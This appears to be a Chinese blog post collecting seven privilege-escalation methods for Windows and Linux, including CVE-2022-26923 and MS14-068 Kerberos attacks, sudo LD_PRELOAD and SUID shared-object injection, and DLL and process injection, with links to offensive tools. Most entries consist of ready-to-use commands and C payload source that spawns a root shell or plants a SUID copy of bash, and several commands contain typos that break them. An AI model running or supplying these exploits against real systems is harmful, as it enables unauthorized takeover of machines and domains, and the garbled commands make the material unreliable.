特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了12种提权方法,本期我们继续整理了7种热门提权方式,请查收哟:
1.CVE-2022-26923
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
certipy req ‘lab.local/cve$:CVEPassword1234*@10.100.10.13’ -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Rubeus.exe asktgt /user:“目标_sam名称” /certificate:cert.pfx /password:“CERTIFICATE_PASSWORD” /domain:“FQDN_域名” /dc:“域名_CONTROLLER” /show
批注:
rubeus:https://github.com/GhostPack/Rubeus
2.MS14-068
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
批注:
无py版本,exe版本:https://github.com/ianxtianxt/MS14-068

3.Sudo LD_PRELOAD
域:No
Local Admin: Yes
操作系统: Linux
类型: Injection
方法:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv(“LD_PRELOAD”);
setgid(0);
setuid(0);
system(“/bin/bash”);
}
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
sudo LD_RELOAD=tmp/ldreload.so apache2

4.Abusing File Permission via SUID Binaries – .so injection)
域:No
Local Admin: Yes
操作系统: Linux
类型: Injection
方法:
mkdir /home/user/.config
#include <stdio.h>

#include <stdlib.h>

static void inject() _attribute _((constructor));

void inject() {

system(“cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p”);

}
gcc -shared -o /home/user/.config/libcalc.so -fPIC/home/user/.config/libcalc.c
/usr/local/bin/suid-so
Id

5.DLL Injection
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
RemoteDLLInjector64
MemJect
Or
https://github.com/tomcarver16/BOF-DLL-Inject
#define PROCESS_NAME “csgo.exe”
Or
RemoteDLLInjector64.exe pid C:\runforpriv.dll
Or
mandllinjection ./runforpriv.dll pid
批注:
remoteDllInjector:https://github.com/Al1ex/RemoteDLLInjector
memject:https://github.com/danielkrupinski/MemJect
在这里插入图片描述

6.Early Bird Injection
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
hollow svchost.exe pop.bin
批注:hollow链接https://github.com/m0n0ph1/Process-Hollowing

7.Process Injection through Memory Section
域:No
Local Admin: Yes
操作系统: Windows
类型: Injection
方法:
sec-shinject PID /path/to/bin
批注:未找到

Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐